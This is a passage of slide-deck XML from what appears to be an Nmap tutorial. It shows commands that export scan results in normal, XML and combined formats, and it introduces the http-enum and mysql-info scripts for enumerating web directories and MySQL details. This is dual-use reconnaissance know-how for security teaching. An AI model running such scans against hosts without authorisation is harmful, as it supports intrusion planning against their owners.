            <a:pPr marL="342900" lvl="0" indent="-278288" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nmap scans can also be exported to a text file. </a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-278288" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It will be slightly different from the original command line output, but it will capture all the essential scan results.</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="139700" lvl="0" indent="-278288" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; nmap -oN output.txt scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="82352"/>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72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1904813" y="597542"/>
            <a:ext cx="64581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XML Output</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Google Shape;472;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-278288" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nmap scans can also be exported to XML. </a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-278288" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It is also the preferred file format of most pen-testing tools, making it easily parsable when importing scan results.</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="139700" lvl="0" indent="-278288" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; nmap -oX output.xml scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="82352"/>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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1904813" y="597542"/>
            <a:ext cx="6458100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Multiple Formats Output</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Google Shape;479;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1645915"/>
            <a:ext cx="8115300" cy="1835700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-274637" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6900">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Export the scan results in all the available formats at once using the -oA command. </a:t>
            </a:r>
            <a:endParaRPr sz="6900">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-274637" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6900">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The below command will export the scan result in three files — output.xml, output.Nmap and output.gnmap..</a:t>
            </a:r>
            <a:endParaRPr sz="6900">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="139700" lvl="0" indent="-274637" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6900">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt;nmap -oA output scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="6900">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="139700" lvl="0" indent="-274637" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6900">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt;ls</a:t>
            </a:r>
            <a:endParaRPr sz="6900">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="139700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="234782"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="317647"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="480" name="Google Shape;480;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="389400" y="3481685"/>
            <a:ext cx="8365199" cy="132918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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540631" y="197231"/>
            <a:ext cx="71619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sz="2700" b="1">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Enumerates Directories Used by Web Servers</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="487" name="Google Shape;487;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1322269"/>
            <a:ext cx="6244032" cy="3821231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6452381" y="1273744"/>
            <a:ext cx="2403300" cy="4051200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="68575" rIns="68575" bIns="68575" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4F58"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The http-enum.nse script enumerates directories used by popular web applications and servers.</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4F58"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Here's an example of how to use the http-enum.nse script:</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEEEE"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>nmap --script=http-enum &lt;target</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540631" y="197231"/>
            <a:ext cx="71619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sz="2700" b="1">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Enumerates MySQL Info</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="Google Shape;495;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6452381" y="1273744"/>
            <a:ext cx="2597100" cy="4228200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="68575" rIns="68575" bIns="68575" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4F58"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The mysql-info.nse script enumerates features of my sql.</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4F58"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Here's an example of how to use the mysql-info.nse script:</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
